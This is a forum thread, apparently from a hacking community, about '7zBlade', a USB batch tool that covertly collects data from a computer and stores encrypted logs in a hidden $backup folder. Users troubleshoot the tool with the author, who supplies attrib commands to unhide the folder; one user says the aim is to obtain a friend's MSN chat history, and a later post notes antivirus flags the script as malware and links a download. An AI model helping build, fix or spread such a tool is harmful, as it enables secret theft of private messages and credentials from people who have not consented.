7zBlade

Gandalf the l33er

Image.7z does _not_ contain the logfiles, only the hack itself. To get the logfiles, make your computer show hidden files and folders, then open the folder named $backup (if i remember correct). Inside that folder is a file, encrypted using the password "haxx0r". Open it, and you have the logfiles.

I have a problem: When I run "run.bat" it does everything it's supossed to do and in the end pops up C: just like you said. I can see the $backup folder, but there are no files in it and it's 0 bytes big. I'm sure I can see hidden folders and files (otherwise I wouldn't be able to see $backup and run.bat).

Tried to fix it. There was a bit of confusing naming in the run.bat, fixed it now.

Try the latest updated release now.

If you still don't see the file, make the following code the contents of a .bat file, and place it in the folder where you extracted the 7zBlade-files:

attrib -H  $backup
attrib -H +R $backup/*.*

Then run it. It will make the logfiles visible again. (hand-coded with no testing, but is is so god damn simple, that it should work)

Well, it still doesn't work. I redownloaded the .zip from the link you posted in your first post here (this one). Still when I klick run.bat it dows something and in the end shows C:, but there are no files in $backup.

I tried it with the batch-file to make the folder visible and yeah, it got visible, but still there were no files in it.

Well, it still doesn't work. I redownloaded the .zip from the link you posted in your first post here (this one). Still when I klick run.bat it dows something and in the end shows C:, but there are no files in $backup.

I tried it with the batch-file to make the folder visible and yeah, it got visible, but still there were no files in it.

Okay...

If you will let me take a look at the output of the bat, i can surely find the reason to the problem.

To do so, enter a new line, containing

pause

at the end of run.bat. Then, after c: has popped up, scrool to the start of the cmd window, and select all the content of the window. Then press enter to copy, and then pm me the text. (your username and ip will be shown in cleartext, you might wanna hide those and other things, feel free to do so)

• 6 months later...

im having the same problem as blue dragon. im using an u3 usb 2gb, i think that´s the problem. The u3 usbs creates 2 virtual disks, for example, f:/ and g:/

i think thats why it doesn´t write the log on $backup (the 7zblade is on g, and tries to write the log on f:/ but it can´t, cause f:/ it´s just read only)

how can i solve this?

what do i modify on the .bat file to make this work?

thanks!!

i suggest.. asigning manually the drive name where it should write the things on the usb.

frgfwk8.th.jpg

as you can see, first, the bat file analyses my own usb stick. not the c:/ of the computer!

and then, i think it fails to create the $backup folder in the temp folder.

and then, all the comands are useless, cause the $backup folder doesn´t exists.

how can i solve this?

and, is there another way to get the msn history of a friend? that´s my biggest purpose to do with this hack!

• 4 months later...

With Avast! I get... http://www.myupload.dk/download/1864144e8f.zip\run.bat as HTML:Malware-gen.

The bat is detected? Bad thing, man.

The code is simple and it looks effective. The problem is that av is detecting the bat (I haven't tried with more av's).

I prefer to have all type of configurable loads for the payload, but, it's not a bad work. For simple tasks, simple sollutions!